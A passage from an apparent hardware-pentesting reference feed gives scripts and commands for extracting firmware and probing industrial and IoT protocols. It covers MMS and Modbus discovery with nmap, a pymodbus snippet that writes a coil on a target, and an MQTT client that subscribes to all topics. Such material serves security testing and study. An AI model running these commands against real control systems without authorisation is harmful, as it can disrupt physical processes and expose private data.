&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;g&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fwsplit&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;fw_code.hex&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;w&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;g&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;g&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fwsplit&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;# Convert ihex to bin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;f&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bincopy&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;BinFile&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;add_ihex_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;fw_code.hex&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;binary&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;as_binary&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;[+] ihex converted to binary&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;## Extract code firmware, bruteforce offset&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;firmware.bin&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;w+b&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;g&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;g&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;binary&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;:])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;subprocess&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;run&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;lzma&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;firmware.bin&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;-d&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;--stdout&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;capture_output&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="kc"&gt;True&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;}&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;loads&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;[+] Javascript code&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;main.ts&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="ne"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;continue&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="extract-firmware-using-swd" class="anchored-heading"&gt;Extract firmware using SWD&lt;a class="heading-anchor" href="#extract-firmware-using-swd" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="connection" class="anchored-heading"&gt;Connection&lt;a class="heading-anchor" href="#connection" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;Solder wires on SWD pins:&lt;/p&gt;</description></item><item><title>MMS - Manufacturing Message Specification</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/mms/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/mms/</guid><description>&lt;ul&gt;
&lt;li&gt;IEC 61850&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="discovery" class="anchored-heading"&gt;Discovery&lt;a class="heading-anchor" href="#discovery" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;MMS Client&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/mz-automation/libiec61850"&gt;Lib 61850&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/robidev/iec61850_open_server"&gt;IEC 61850 Open Server&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;MMS Discovery Nmap Script&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Source: &lt;a href="https://github.com/atimorin/scada-tools/blob/master/mms-identify.nse"&gt;mms-identify.nse&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;nmap -d --script mms-identify.nse --script-args&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;mms-identify.timeout=500&amp;#39;&lt;/span&gt; -p &lt;span class="m"&gt;102&lt;/span&gt; &amp;lt;target_host&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="explore-mms" class="anchored-heading"&gt;Explore MMS&lt;a class="heading-anchor" href="#explore-mms" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://libiec61850.com/documentation/iec-61850-client-tutorial/"&gt;MMS Client Example&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://libiec61850.com/documentation/iec-61850-server-tutorial/"&gt;MMS Server Example&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="fuzzing-mms" class="anchored-heading"&gt;Fuzzing MMS&lt;a class="heading-anchor" href="#fuzzing-mms" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/fkie-cad/61850-fuzzing"&gt;61850-fuzzing&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Modbus</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/modbus/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/modbus/</guid><description>&lt;h2 id="discovery" class="anchored-heading"&gt;Discovery&lt;a class="heading-anchor" href="#discovery" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Modbus Client:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://sourceforge.net/projects/qmodbus/"&gt;QModBus&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/riptideio/pymodbus"&gt;pymodbus&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.modbustools.com/"&gt;Modbus Tools&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Modbus Discover Nmap Script:&lt;/strong&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;nmap --script modbus-discover.nse --script-args&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;modbus-discover.aggressive=true&amp;#39;&lt;/span&gt; -p &lt;span class="m"&gt;502&lt;/span&gt; &amp;lt;host&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Connect to Modbus Slave:&lt;/strong&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;pymodbus.client&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;ModbusTcpClient&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ModbusTcpClient&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;lt;IP_Address_of_Target&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write_coil&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;True&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read_coils&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;bits&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Modbus Pentesting:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/0x0mar/smod"&gt;smod&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="modbus-simulators" class="anchored-heading"&gt;Modbus Simulators&lt;a class="heading-anchor" href="#modbus-simulators" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Modbus Slave Simulator&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.modbusdriver.com/diagslave.html"&gt;Diagslave&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://modbuspal.sourceforge.net/"&gt;ModbusPal&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Modbus Master Simulator&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.modbusdriver.com/modpoll.html"&gt;modpoll&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>MQTT - Message Queuing Telemetry Transport</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/mqtt/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/mqtt/</guid><description>&lt;h2 id="discovery" class="anchored-heading"&gt;Discovery&lt;a class="heading-anchor" href="#discovery" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;MQTT is a lightweight messaging protocol often used in IoT (Internet of Things) applications.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;1883: Default port for MQTT.&lt;/li&gt;
&lt;li&gt;8883: Default port for MQTT over TLS/SSL.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;MQTT client:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;mqtt-spy&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://asciinema.org/a/DlPmJwXbhuAURHseamGdMy4z3/embed?speed=2&amp;amp;autoplay=true"&gt;MQTT CLI&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://chrome.google.com/webstore/detail/mqttlens/hemojaaeigabkbcookmlgmdigohjobjm"&gt;MQTT Lens&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;MQTT.fx&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;mosquitto_tools&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;mosquitto_sub&lt;/span&gt; &lt;span class="n"&gt;-h&lt;/span&gt; &lt;span class="n"&gt;sensors&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;#&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;mosquitto_sub&lt;/span&gt; &lt;span class="n"&gt;-h&lt;/span&gt; &lt;span class="n"&gt;sensors&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;+&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;mosquitto_sub&lt;/span&gt; &lt;span class="n"&gt;-h&lt;/span&gt; &lt;span class="n"&gt;sensors&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;/sensor/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Scan an MQTT with nmap :&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;nmap&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="mf"&gt;1883&lt;/span&gt; &lt;span class="n"&gt;-vvv&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-script&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;mqtt-subscribe&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;sensors&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;com&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="explore-mqtt" class="anchored-heading"&gt;Explore MQTT&lt;a class="heading-anchor" href="#explore-mqtt" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Connect and subscribe to every topics using the &lt;code&gt;#&lt;/code&gt; keyword.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;paho.mqtt.client&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nn"&gt;mqtt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;on_connect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;userdata&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;flags&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;rc&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;print&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;[+] Connection successful&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;subscribe&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;#&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;qos&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="c1"&gt;# Subscribe to all topics&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;subscribe&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;$SYS/#&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="c1"&gt;# Broker Status (Mosquitto)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;on_message&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;userdata&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;msg&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;print&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;[+] Topic: &lt;/span&gt;&lt;span class="si"&gt;%s&lt;/span&gt;&lt;span class="s1"&gt; - Message: &lt;/span&gt;&lt;span class="si"&gt;%s&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;msg&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;topic&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;msg&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;mqtt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;client_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;MqttClient&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;on_connect&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;on_connect&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;on_message&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;on_message&lt;/span&gt;
